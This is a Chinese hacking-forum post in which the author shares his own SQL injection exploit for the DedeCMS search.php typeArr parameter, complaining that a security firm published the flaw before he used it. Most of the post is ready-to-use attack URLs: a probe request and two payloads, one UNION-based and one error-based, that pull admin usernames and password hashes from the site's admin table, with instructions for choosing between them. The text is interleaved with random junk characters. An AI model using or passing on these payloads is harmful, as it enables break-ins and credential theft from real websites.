转载不加作者名的没JJ) Q9 I# f; z6 f1 M4 |: E2 g
8 g/ Y8 W1 J: \2 a _1 C2 p哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。1 a# Z4 s0 m0 ?, V+ N" W3 s7 O Q' s
9 ^1 h7 w& U8 O1 [1 l既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
9 ?" M. t: F- u8 |9 S% I2 d
1 R. ^. b( k, ] K我一般是这样测试的:, t2 M/ E' q+ r
/ R) c! |" K. N. e, z提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a; Q) J" q- @" y K8 ^/ P B
2 h( e8 M4 `& r* {
转载不加作者名的没JJ
5 Z! K2 M2 o- c0 G9 f% G" I1 g! A0 R5 B; w; L3 ^( {
作者:鬼哥
5 {8 \ h; C8 l8 ^8 ^' J$ q
0 e, v, ^: J# k* A* |' Q U. ^ 6 B8 {2 N) B2 T. G3 M
7 V- u5 I5 O( r7 o( p6 C+ W! k看结果如果提示
; b& {/ r8 g: b) I. Y7 U7 D) D
( X7 X2 m& T8 y, bSafe Alert: Request Error step 2 !
4 X& w: G3 S: ]. W% E2 z* T" W$ Q/ D) P6 i+ q k( @
那么直接用下面的exp
# C0 b4 r+ n+ F4 }6 v8 m' G8 `6 }0 N4 a' F$ [- ~) P
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a4 K( |7 k" h5 E! p1 k( J4 @+ x
. L; ^+ z1 k( G a/ r1 ?' W* Y. D& _( V1 S
看结果如果提示7 `. V/ Q/ M: o; G; I0 b
7 K* W5 }6 ^1 h5 Y" _ fSafe Alert: Request Error step 1 !
, D- W; o. r" K/ X1 }' L/ F
$ a, R9 _2 A4 r4 Q那么直接用下面的exp4 g2 K8 r' _7 e4 }( g2 W5 f6 o9 q
g! I# i. ]6 [ R
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a. b9 E' {* _# ], D( W
1 X+ }* j) @( t$ K& ^9 P# V- d, K" G( y1 z- l
如果正常显示证明漏洞不存在了。+ F! d5 j2 C* [, E1 c0 S( F! Z0 @
' U# A. w8 T9 {7 R转载不加作者名的没JJ |